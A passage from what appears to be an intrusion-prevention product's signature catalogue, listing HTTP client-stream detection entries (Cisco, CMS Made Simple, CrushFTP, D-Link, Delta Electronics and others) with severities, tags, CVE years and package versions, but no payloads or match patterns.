Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Evolved Programmable Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1173-5242
Vulnerability: Cisco-Prime-Infrastructure-Xmplogfilesdownloadservlet-Directory-Traversal
Description:
Back to top

HTTP_CS-Cisco-RV-Series-Authentication-Bypass-And-Command-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Small Business Routers.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Cisco Small Business RV VPN/Routers, CVE2022, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Cisco-RV-Series-Authentication-Bypass-And-Command-Injection
Description:
Back to top

HTTP_CS-Cisco-Security-Agent-Management-Center-Code-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Systems Security Agent Management Center detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Security Agent Management Center, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Cisco-Security-Agent-Management-Center-Code-Execution
Description:
Back to top

HTTP_CS-Cisco-UCS-Director-Amf-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Systems UCS Director detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco UCS Director, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1385-5242
Last changed: sgpkg-ips-1385-5242
Vulnerability: Cisco-UCS-Director-Amf-External-Entity-Injection
Description:
Back to top

HTTP_CS-Cisco-UCS-Director-Isenablerestkeyaccesscheckforuser-Authentication-Bypass-Vulnerability

About this situation: An attempt to exploit a vulnerability in Cisco Systems UCS Director detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco UCS Director, CVE2020, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1248-5242
Vulnerability: Cisco-UCS-Director-Isenablerestkeyaccesscheckforuser-Auth-Bypass-Vulnerability
Description:
Back to top

HTTP_CS-Cisco-UCS-Director-Mycallable-Call-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems UCS Director detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco UCS Director, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1252-5242
Vulnerability: Cisco-UCS-Director-Mycallable-Call-Directory-Traversal
Description:
Back to top

HTTP_CS-Cisco-UCS-Director-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in Cisco UCS Director detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco UCS Director, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1614-5242
Vulnerability: Cisco-UCS-Director-Unauthenticated-RCE
Description:
Back to top

HTTP_CS-Citrix-XenApp-XML-Service-Interface-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Citrix Systems Presentation Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Presentation Server, Citrix XenApp, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Citrix-XenApp-XML-Service-Interface-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CS-Clampi-Bot-Traffic

About this situation: Possible Clampi Bot traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Clampi-Bot
Description:
Back to top

HTTP_CS-Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-55956

About this situation: An attempt to exploit a vulnerability in Cleo VLTrader detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cleo VLTrader, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1813-5242
Last changed: sgpkg-ips-1813-5242
Vulnerability: Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-55956
Description:
Back to top

HTTP_CS-Client-Stream-Context-Shared-Subexpression

About this situation: This fingerprint is used by other situations and won't match by itself
Context: HTTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-571-5211
Description:
Back to top

HTTP_CS-Clinics-Patient-Management-System-PHP-File-Upload

About this situation: An attempt to exploit a vulnerability in Clinic's Patient Management System
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Clinic's Patient Management System, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Vulnerability: Clinics-Patient-Management-System-PHP-File-Upload
Description:
Back to top

HTTP_CS-CMS-Made-Simple-Authenticated-RCE-Via-Object-Injection

About this situation: An attempt to exploit a vulnerability in CMS Made Simple detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CMS Made Simple, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1206-5242
Vulnerability: CMS-Made-Simple-Authenticated-RCE-Via-Object-Injection
Description:
Back to top

HTTP_CS-CMS-Made-Simple-RCE

About this situation: An attempt to exploit a vulnerability in CMS Made Simple detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CMS Made Simple, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1117-5242
Vulnerability: CMS-Made-Simple-RCE
Description:
Back to top

HTTP_CS-CMS-Made-Simple-Showtime2-File-Upload-RCE

About this situation: An attempt to exploit a vulnerability in CMS Made Simple detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CMS Made Simple, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1197-5242
Last changed: sgpkg-ips-1197-5242
Vulnerability: CMS-Made-Simple-Showtime2-File-Upload-RCE
Description:
Back to top

HTTP_CS-CmsMadeSimple-Authenticated-File-Manager-RCE-CVE-2023-36969

About this situation: An attempt to exploit a vulnerability in CMS Made Simple
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CMS Made Simple, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1862-5242
Last changed: sgpkg-ips-1862-5242
Vulnerability: CmsMadeSimple-Authenticated-File-Manager-RCE-CVE-2023-36969
Description:
Back to top

HTTP_CS-CodeIgniter-Common.php-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in CodeIgniter PHP framework detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CodeIgniter, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: CodeIgniter-Common.php-Insecure-Deserialization
Description:
Back to top

HTTP_CS-Commvault-Commcell-Cvsearchservice-Downloadfile-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Commvault CommCell detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Commvault CommCell, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1418-5242
Last changed: sgpkg-ips-1418-5242
Vulnerability: Commvault-Commcell-Cvsearchservice-Downloadfile-Authentication-Bypass
Description:
Back to top

HTTP_CS-Conficker-Worm-Request

About this situation: Detected a request generated by W32/Conficker worm
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-200-2032
Last changed: sgpkg-ips-1503-5242
Vulnerability: Downandup-Worm-Request
Description:
Back to top

HTTP_CS-Contec-Conprossys-HMI-System-Chkformula-Command-Injection

About this situation: An attempt to exploit a vulnerability in Contec CONPROSYS HMI System (CHS) detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Contec CONPROSYS HMI System, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1546-5242
Last changed: sgpkg-ips-1626-5242
Vulnerability: Contec-Conprossys-HMI-System-Chkformula-Command-Injection
Description:
Back to top

HTTP_CS-CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177

About this situation: An attempt to exploit a vulnerability in CrushFTP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CrushFTP, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1655-5242
Last changed: sgpkg-ips-1718-5242
Vulnerability: CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177
Description:
Back to top

HTTP_CS-CrushFTP-Potential-Improper-Modification-Of-Object-Attributes-CVE-2023-43177

About this situation: An attempt to exploit a vulnerability in CrushFTP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CrushFTP, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1655-5242
Last changed: sgpkg-ips-1655-5242
Vulnerability: CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177
Description:
Back to top

HTTP_CS-Crystal-Reports-File-Removal

About this situation: Vulnerable script accessed
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Crystal Reports, MS2004-06, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Crystal-Reports-File-Removal
Description:
Back to top

HTTP_CS-CSuiteCRM-Log-File-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in SuiteCRM detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, SuiteCRM, CVE2020, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Vulnerability: SuiteCRM-Log-File-Remote-Code-Execution
Description:
Back to top

HTTP_CS-CUPS-Gif-Decoding-Routine-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Common Unix Printing System (CUPS) detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Common UNIX Printing System, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-201-2032
Vulnerability: CUPS-Gif-Decoding-Routine-Buffer-Overflow
Description:
Back to top

HTTP_CS-CUPS-Text-To-PostScript-texttops-Filter-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in CUPS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Common UNIX Printing System, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-189-2032
Last changed: sgpkg-ips-506-5211
Vulnerability: CUPS-Text-To-PostScript-texttops-Filter-Integer-Overflow
Description:
Back to top

HTTP_CS-Cyberpanel-Getresetstatus-Command-Injection

About this situation: An attempt to exploit a vulnerability in CyberPanel detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CyberPanel, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Cyberpanel-Remote-Code-Execution-CVE-2024-51567
Description:
Back to top

HTTP_CS-Cyberpanel-submitWebsiteCreation-Command-Injection-CVE-2024-53376

About this situation: An attempt to exploit a vulnerability in CyberPanel
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CyberPanel, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, 2nd Most Recent Update, 3rd Most Recent Update, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-1872-5242
Last changed: sgpkg-ips-1872-5242
Vulnerability: Cyberpanel-submitWebsiteCreation-Command-Injection-CVE-2024-53376
Description:
Back to top

HTTP_CS-D-Link-CWM-100-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in D-Link CWM 100 detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link CWM 100, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1292-5242
Vulnerability: D-Link-CWM-100-Remote-Code-Execution
Description:
Back to top

HTTP_CS-D-Link-D-View-Adddv7probe-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in D-Link D-View 8 detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link D-View, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Vulnerability: D-Link-D-View-Adddv7probe-External-Entity-Injection
Description:
Back to top

HTTP_CS-D-Link-D-View-Uploadfile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in D-Link D-View 8 detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Vulnerability: D-Link-D-View-Uploadfile-Directory-Traversal
Description:
Back to top

HTTP_CS-D-Link-D-View-Uploadmib-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in D-Link D-View detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link D-View, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1638-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: D-Link-D-View-Uploadmib-Directory-Traversal
Description:
Back to top

HTTP_CS-D-Link-DIR-809-Devices-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in D-Link DIR-809 devices detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link DIR-809, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1421-5242
Last changed: sgpkg-ips-1426-5242
Vulnerability: D-Link-DIR-809-Devices-Buffer-Overflow
Description:
Back to top

HTTP_CS-D-Link-DIR-859-Gena.cgi-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in D-Link DIR-859 routers detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: D-Link-DIR-859-Gena.cgi-Remote-Command-Execution
Description:
Back to top

HTTP_CS-D-Link-DWL-2600AP-Command-Injection-CVE-2019-20500

About this situation: An attempt to exploit a vulnerability in D-Link DWL-2600AP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, DLINK DWL-2600, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: D-Link-DWL-2600AP-Command-Injection-CVE-2019-20500
Description:
Back to top

HTTP_CS-D-Link-HNAP-Request-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in D-Link Systems DIR-505 detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link DIR-505, D-Link DIR-505L, D-Link DSP-W215, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Vulnerability: D-Link-HNAP-Request-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CS-Danmec-Traffic

About this situation: DanMec traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Danmec
Description:
Back to top

HTTP_CS-Darwin-Streaming-Server-Dot-Dot-Slash-Msdos-Device-Name-DoS

About this situation: Possible denial of service (DoS) attack against Darwin Streaming Server
Context: HTTP Client Stream
Severity: 2
Tags: Windows, Any Hardware, Darwin Streaming Server, Apple QuickTime, CVE2003, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Darwin-Streaming-Server-Dot-Dot-Slash-Msdos-Device-Name-DoS
Description:
Back to top

HTTP_CS-DEBUG-Request

About this situation: HTTP DEBUG request method was detected
Context: HTTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CS-Dell-SonicWall-Scrutinizer-SQL-Injection

About this situation: An attempt to exploit a Dell SonicWall Scrutinizer SQL Injection vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWALL Scrutinizer, CVE2012, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-781-5211
Vulnerability: Dell-SonicWall-Scrutinizer-SQL-Injection
Dell-SonicWall-Scrutinizer-methodDetail-SQL-Injection
Description:
Back to top

HTTP_CS-Delta-Electronics-Infrasuite-Insecure-Deserialization-CVE-2023-47207

About this situation: An attempt to exploit a vulnerability in Delta Electronics InfraSuite Device Master detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics InfraSuite Device Master, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1749-5242
Last changed: sgpkg-ips-1749-5242
Vulnerability: Delta-Electronics-Infrasuite-Insecure-Deserialization-CVE-2023-47207
Description:
Back to top

HTTP_CS-Delta-Electronics-Infrasuite-Potential-Insecure-Deserialization-CVE-2023-47207

About this situation: An attempt to exploit a vulnerability in Delta Electronics InfraSuite Device Master detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics InfraSuite Device Master, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1749-5242
Last changed: sgpkg-ips-1749-5242
Vulnerability: Delta-Electronics-Infrasuite-Insecure-Deserialization-CVE-2023-47207
Description:
Back to top

HTTP_CS-Delta-Industrial-Automation-Diaenergie-Handler-TCV-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1480-5242
Last changed: sgpkg-ips-1480-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Handler-TCV-SQL-Injection
Description:
Back to top

HTTP_CS-Delta-Industrial-Automation-Dialink-Events-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Delta Industrial Automation DIALink detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIALink, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Delta-Industrial-Automation-Dialink-Events-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Diaenergie-SQL-Injection-CVE-2024-4548

About this situation: An attempt to exploit a vulnerability in DIAEnergie detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Vulnerability: Diaenergie-SQL-Injection-CVE-2024-4548
Description:
Back to top

HTTP_CS-Digium-Asterisk-Cookie-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in Digium Certified Asterisk detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1697-5242
Vulnerability: Digium-Asterisk-Cookie-Stack-Overflow
Description:
Back to top

HTTP_CS-Digium-Asterisk-Res_HTTP_WebSocket-HTTP-Upgrade-Request-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk Open Source, Digium Certified Asterisk, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Digium-Asterisk-Res_HTTP_WebSocket-HTTP-Upgrade-Request-Denial-Of-Service
Description:
Back to top

HTTP_CS-Digium-Asterisk-WebSocket-Frame-Empty-Payload-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk Open Source, CVE2018, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1121-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Digium-Asterisk-WebSocket-Frame-Empty-Payload-Denial-Of-Service
Description:
Back to top

HTTP_CS-DirectConnect-Client-To-Client-Handshake

About this situation: Detects DirectConnect client handshake, possible DDOS attempt
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-518-5211
Vulnerability: DirectConnect-ConnectToMe-DOS
Description:
Back to top

HTTP_CS-Directory-Traversal-Cmd-Exe-System-Compromise

About this situation: Windows cmd.exe access
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Generic HTTP server, Windows not specific, Generic HTTP server not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-Cmd-Exe-System-Compromise
Description:
Back to top

HTTP_CS-Diva-ISDN-Password-BOF

About this situation: Diva ISDN Password Buffer Overflow
Context: HTTP Client Stream
Severity: 2
Tags: Other, Any Hardware, CVE1999, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-438-4219
Vulnerability: HTTP-Diva-ISDN-Password-BOF
Description:
Back to top

HTTP_CS-Django-Multipartparser.py-Parse-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Django Software Foundation Django detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Django, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1633-5242
Vulnerability: Django-Multipartparser.py-Parse-Denial-Of-Service
Description:
Back to top

HTTP_CS-DLINK-DWL-2600-Authenticated-RCI

About this situation: An attempt to exploit a vulnerability in DLINK DWL-2600 detected
Context: HTTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, DLINK DWL-2600, CVE2019, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: DLINK-DWL-2600-Authenticated-RCI
Description:
Back to top

HTTP_CS-Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection

About this situation: An attempt to exploit a vulnerability in Dolibarr ERP and CRM Suite detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Dolibarr, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1498-5242
Last changed: sgpkg-ips-1498-5242
Vulnerability: Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection
Description:
Back to top

HTTP_CS-Dotcms-RCE-Via-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in dotCMS detected.
Context: HTTP Client Stream
Severity: 7
